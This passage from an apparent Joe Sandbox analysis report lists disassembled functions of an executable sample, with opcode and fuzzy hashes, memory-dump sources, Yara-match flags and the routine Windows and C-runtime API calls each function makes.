                                                        • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                                        • Instruction ID: 465a892a4f4d3f42855d86089aadac46603aef8161539a223c1ae585d88c4d3f
                                                        • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                                        • Instruction Fuzzy Hash: 7FB13E31610608EFD715CF68C48AF657BE1FF85365F2A8668E999CF2A1C335E981CB40
                                                        APIs
                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00415729,?,?,00000008,?,?,0041C68A,00000000), ref: 0041595B
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionRaise
                                                        • String ID:
                                                        • API String ID: 3997070919-0
                                                        • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                                        • Instruction ID: 6715a78ad53a010e1f654acf6738d2326510568a7b3af97ced4f43bd22a978ec
                                                        • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                                        • Instruction Fuzzy Hash: 02B17E71520A08DFD714CF28C486BE57BE0FF85364F298659E899CF2A1C339D992CB45
                                                        APIs
                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040A302
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FeaturePresentProcessor
                                                        • String ID:
                                                        • API String ID: 2325560087-0
                                                        • Opcode ID: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                                                        • Instruction ID: 655f466d2002f1984def2d585099db1cc9528c498776e59a8b59a497753dfce5
                                                        • Opcode Fuzzy Hash: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                                                        • Instruction Fuzzy Hash: 4C5136B1E10315CFDB24CF95D8857AABBF0FB48314F24803AD905EB3A1D37899568B99
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 30f242089dd6e22cc4e11ed5014ed8825358ef4a723b8267613fb38b8f4a68e2
                                                        • Instruction ID: 335cc09878d9dc9b483997cee4c12024a5fb43c2c5be13206e8e105b8fe94413
                                                        • Opcode Fuzzy Hash: 30f242089dd6e22cc4e11ed5014ed8825358ef4a723b8267613fb38b8f4a68e2
                                                        • Instruction Fuzzy Hash: 1B41B475C0425DAFEB10DF69CC89AEABBB9FF45240F1442D9E44DD3205DA359E848F10
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                                                        • Instruction ID: 3c86b5082e8d69261092a566fc7116ef82f045dd3f36460ee5d119ba5ccfeeec
                                                        • Opcode Fuzzy Hash: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                                                        • Instruction Fuzzy Hash: 9E4185B580421DAFDB20DFA9CC88EEABBBDEF85304F1441E9E41993240DB34AE458F50
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                                                        • Instruction ID: 0da0f6d43ac66bea4d05f4cd5f3fcaee254ac53de518b98f89be5a9909b1102a
                                                        • Opcode Fuzzy Hash: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                                                        • Instruction Fuzzy Hash: 7B41B4B5C0421CAEDF20DF69CC89AEABBB8AF44304F1442DEE419D3241DA389E85CF54
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0
                                                        • API String ID: 0-4108050209
                                                        • Opcode ID: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                                                        • Instruction ID: 80d39860ba596042c6fc9439c19d35131d79081112385e104b5c6a497e5f476b
                                                        • Opcode Fuzzy Hash: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                                                        • Instruction Fuzzy Hash: 14C1E238E00606CFDB24CF68C588A7ABBBAFF87306F144A39D45697699D330B945CB51
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0
                                                        • API String ID: 0-4108050209
                                                        • Opcode ID: 8470d482166b29df0f0bdf2b707670bb0d2149d7074c5d4c6b8b9bc3646ec2c9
                                                        • Instruction ID: a862614980e7782cfb360a41e62bb903fc37a91afa162c473b4857922a947482
                                                        • Opcode Fuzzy Hash: 8470d482166b29df0f0bdf2b707670bb0d2149d7074c5d4c6b8b9bc3646ec2c9
                                                        • Instruction Fuzzy Hash: DDC1EE309006079ECB34CE69C584A7BBBB1AB45304F144A7FD856B7BD2C339AD0ACB59
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0
                                                        • API String ID: 0-4108050209
                                                        • Opcode ID: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                                                        • Instruction ID: df02c9979792838335ad85f5bf0a52fdc08c31d9d2e86d80961a4d51b3c6a9f5
                                                        • Opcode Fuzzy Hash: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                                                        • Instruction Fuzzy Hash: 0EB1D374A0460B8BDF348FA8C558ABEBBA9EF47306F04063DE452D7694D771B901CB51
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0
                                                        • API String ID: 0-4108050209
                                                        • Opcode ID: 0c5b649a34a28a7901ced7402a87d0ab1891e4bc7ca1eda254f1c36e1c86cddc
                                                        • Instruction ID: c83ad001e3c04e1f23fe5313526111bf351830610e2bf169758c16327f184a9c
                                                        • Opcode Fuzzy Hash: 0c5b649a34a28a7901ced7402a87d0ab1891e4bc7ca1eda254f1c36e1c86cddc
                                                        • Instruction Fuzzy Hash: 3EB1E47090460B8BDB248E6AC555ABFB7A1AF41304F140E3FD452B77C1C73EAD268B89
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(0040A72C,0493A30B), ref: 0493A98C
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                                                        • Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
                                                        • Opcode Fuzzy Hash: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                                                        • Instruction Fuzzy Hash:
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0000A72C,0040A0A4), ref: 0040A725
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                                                        • Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
                                                        • Opcode Fuzzy Hash: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                                                        • Instruction Fuzzy Hash:
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                                                        • Instruction ID: 2119cb9e33fec53289003fbb8559c0bd9e138a5c3f232e450aa7d4159409e329
                                                        • Opcode Fuzzy Hash: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                                                        • Instruction Fuzzy Hash: 91320331E29F014DD7239A34D922336A649AFB73D4F56D737E819B5AA9EF28C4C34108
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 74480139216af947ab2088351c2c997bcf12f206ef2642e816869db62e08510f
                                                        • Instruction ID: 91012e0ae8dda665760919d2a819ba5377a1558b005be8061afa3fe50499e2ec
                                                        • Opcode Fuzzy Hash: 74480139216af947ab2088351c2c997bcf12f206ef2642e816869db62e08510f
                                                        • Instruction Fuzzy Hash: 5E5114F3B185005FF340993EDD1977B769ADBD4321F2B8639DA84D7B84ED38880A8241
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d2373e8ed2032865abcedf1b9711d2a083dc66005cba1cc3537861863d6580f5
                                                        • Instruction ID: eb66ae76247a41d32258805fc35809ffe05353d9a50f27195dcc79b4cf810fcd
                                                        • Opcode Fuzzy Hash: d2373e8ed2032865abcedf1b9711d2a083dc66005cba1cc3537861863d6580f5
                                                        • Instruction Fuzzy Hash: 7A51A4B26181109FE314BE2DDC4576AB7E5EF94320F06493DE7C0C7384EA35A810879A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8dedb30c699242c98fc25a554e6b57d08db7f18df350a639d497fc6efd8a2a88
                                                        • Instruction ID: 7bc1e769fb17625b566b040e22a47bf6b165c75f8c9fe209e32b94edf147ec18
                                                        • Opcode Fuzzy Hash: 8dedb30c699242c98fc25a554e6b57d08db7f18df350a639d497fc6efd8a2a88
                                                        • Instruction Fuzzy Hash: 0351A0B36082109FE304AF6CEC8577ABBE4EF54720F564A3DE6D5C7784E67558008A87
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 456fc76c50f0d8cfa792de3d5673275826e9fc2b76c57676047214286b5e458c
                                                        • Instruction ID: 5c5a24dc7f92b301bb3a4ce0c85c00a8b04c7521804abf269c4c8b2720f36c46
                                                        • Opcode Fuzzy Hash: 456fc76c50f0d8cfa792de3d5673275826e9fc2b76c57676047214286b5e458c
                                                        • Instruction Fuzzy Hash: E741C1F3A0C6109FE304AE2ADC457AFBBE6EFD4720F16852DD6C487644EA3558018787
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6197cbc0ccda904b1c7826c1ed3bcc40072b0632b88b9f44c1a7cfa58099caa0
                                                        • Instruction ID: f786274ae63626d32f0024b1f91c3ea3b17454a47241976d78e6ed00e0370732
                                                        • Opcode Fuzzy Hash: 6197cbc0ccda904b1c7826c1ed3bcc40072b0632b88b9f44c1a7cfa58099caa0
                                                        • Instruction Fuzzy Hash: 1651B0B3F10A254BF3504964CC58362B283EBA5324F2F8178CE486B3C5E93E5C0943C4
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4d10573f3aea8a737000ad762e903249c595452806b60597eecae39d0db62f3f
                                                        • Instruction ID: 0904a11e3ea9024ec9483abefb7bfff203dde4d92884749a21fd7bb3f0864225
                                                        • Opcode Fuzzy Hash: 4d10573f3aea8a737000ad762e903249c595452806b60597eecae39d0db62f3f
                                                        • Instruction Fuzzy Hash: DB41A3F3F1092507F3544928DC943A26283DBE5315F2F82788A5CEB7C6E97E9C0A5284
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.00000000006F3000.00000040.00000001.01000000.00000003.sdmp, Offset: 006F3000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6f3000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dcadce643a1ba9a4b6e0c0b4293b49338ef624531003eff63a67ee12037ce2a5
                                                        • Instruction ID: 2f36028a88e1c1b1f5c426645fcc5ef7a4a7f468230c5a4c6e6bcf279509ffaa
                                                        • Opcode Fuzzy Hash: dcadce643a1ba9a4b6e0c0b4293b49338ef624531003eff63a67ee12037ce2a5
                                                        • Instruction Fuzzy Hash: B131FCB250C300AFE305BE65EDC1ABAF7E9FB58760F16492DEAC182500C33559459A67
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_5f1000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6b444608b4411d0ed1c40cdbe9de63bb3b97760703091c9bce341acd755e3de1
                                                        • Instruction ID: 2feebc69bda4ef421f3f936ccfd422e39742b6934aff49fc504b25d37dd11691
                                                        • Opcode Fuzzy Hash: 6b444608b4411d0ed1c40cdbe9de63bb3b97760703091c9bce341acd755e3de1
                                                        • Instruction Fuzzy Hash: 45414AB250C7109FE309BF29D8866BAFBE5EF58310F06492CE6C583750EA755880CB97
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_5f1000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 816818ce4c32524fb9ff967f5076c1837595c78ef153306fd6461e2e95cc66fb
                                                        • Instruction ID: fb48c709ad1664bf694fd82e0594d3dbc7ae353afc665fec5db5ad40180af1f1
                                                        • Opcode Fuzzy Hash: 816818ce4c32524fb9ff967f5076c1837595c78ef153306fd6461e2e95cc66fb
                                                        • Instruction Fuzzy Hash: C8314DF250C200AFE71A6F08D841BBEFBE9FF98320F15482EE6C492650E77548509B67
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.00000000006F3000.00000040.00000001.01000000.00000003.sdmp, Offset: 006F3000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6f3000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bc0ad2a8328eb5fa28338e81d8f728ee52c652e4ab21b6ed034448f5141a9f12
                                                        • Instruction ID: 5cc03f629ae5d0738d8cb9255a71a71101fcf68a1f43d121a66fdaae04545fd3
                                                        • Opcode Fuzzy Hash: bc0ad2a8328eb5fa28338e81d8f728ee52c652e4ab21b6ed034448f5141a9f12
                                                        • Instruction Fuzzy Hash: 3731B4B254C3009FE305BF68E8C2AAAFBE5FF18750F16492DDAC586610D335A840DB97
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.00000000006F3000.00000040.00000001.01000000.00000003.sdmp, Offset: 006F3000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6f3000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 146da863df1e82ccde7dead3a4e61bd74a6d04ad1026a46e7c01765f7feb729d
                                                        • Instruction ID: 3ea8528964e453873dbd19fb4e2f8e362dfc9a882665e28857173660b210feb7
                                                        • Opcode Fuzzy Hash: 146da863df1e82ccde7dead3a4e61bd74a6d04ad1026a46e7c01765f7feb729d
                                                        • Instruction Fuzzy Hash: F531D8B250C700DFE305BE68E8C1AAAFBE5FF18750F16092DDAC586650C335A840DB97
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6dd4bc9d0723a979c1f5288e091cf180c0e7f5e21c54f2103faf2cb2984c5a90
                                                        • Instruction ID: 3f9a76a5b63763ccaa36959ab3ea69f574ddbb5950fbf0fb7cb95417fba6f7a0
                                                        • Opcode Fuzzy Hash: 6dd4bc9d0723a979c1f5288e091cf180c0e7f5e21c54f2103faf2cb2984c5a90
                                                        • Instruction Fuzzy Hash: 16219DF3F10A210BF3584939CC593617A529BA6310F2F82BD8B8867BC6CD7D1D0A9684
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                        • Instruction ID: 6858cf0c51ff5caabfc3a7f957f7e97cc4d55c404d013567cdc706fa4bfc5bf2
                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                        • Instruction Fuzzy Hash: 5111087774118243D681C56DC4F86ABA3DEFBC52A0729436AF0D28FA58D2F2DAC5A600
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                        • Instruction ID: 8ba1ab7b0bfeeb901e46fc60194cdb45568bb921775d1e8103c105e1eee8a698
                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                        • Instruction Fuzzy Hash: 021104772001828796558A2ED4B42B6F79EEFC732FB2C467AD0858F75BD222B144D600
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                        • Instruction ID: ca795268159c21d128c013142cdfc2d9b79cbc1da2bbaf958516ecc3655a5718
                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                        • Instruction Fuzzy Hash: 39113DBB24014243D614873DD9F49B7A395EBC5320B2D437BD1416B7D4D33AE9459A8C
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025597799.0000000004780000.00000040.00001000.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4780000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                        • Instruction ID: 87d63b9c504f10c387b1538ec813dd5751f91771679579b4bd69b1c61f40f319
                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                        • Instruction Fuzzy Hash: 941182723801009FD754EF55DC90FA673EAEB89230B29805AED05CB315E675FC41C7A0
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                        • Instruction ID: 9051fdc12d63c429d47f73a110bf54da03349bf3259fd21df59c7494944553dd
                                                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                        • Instruction Fuzzy Hash: F401A276B006049FDF21CF24C808BAA33E9FB87217F4544B5E91A9B289E774B9418B90
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                                        • Instruction ID: 49573a245b17cd2143a7f0a663dc82b9d5ba07e6c12e429f55ccbb336c262c76
                                                        • Opcode Fuzzy Hash: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                                        • Instruction Fuzzy Hash: CEE08C32E11228EBCB10CB88C940E8AB3ECFB86A80F114096B505E3101D274DF00C7C2
                                                        APIs
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,00409BBB), ref: 00409BE9
                                                        • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409BBB), ref: 00409BF4
                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409BBB), ref: 00409C05
                                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00409C17
                                                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00409C25
                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409BBB), ref: 00409C48
                                                        • DeleteCriticalSection.KERNEL32(0042D064,00000007,?,?,00409BBB), ref: 00409C64
                                                        • CloseHandle.KERNEL32(00000000,?,?,00409BBB), ref: 00409C74
                                                        Strings
                                                        • WakeAllConditionVariable, xrefs: 00409C1D
                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00409BEF
                                                        • SleepConditionVariableCS, xrefs: 00409C11
                                                        • kernel32.dll, xrefs: 00409C00
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                        • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                        • API String ID: 2565136772-3242537097
                                                        • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                                        • Instruction ID: 8f8b07cbf63392261d8dc325579aef03bb655b7cde116df0e27078c5153b7531
                                                        • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                                        • Instruction Fuzzy Hash: 6F015271F48711ABE7205BB4BD09F562BD8AB49705B554032BA05E22A2DB78CC068A6C
                                                        APIs
                                                        • ___free_lconv_mon.LIBCMT ref: 1000A045
                                                          • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C43D
                                                          • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C44F
                                                          • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C461
                                                          • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C473
                                                          • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C485
                                                          • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C497
                                                          • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4A9
                                                          • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4BB
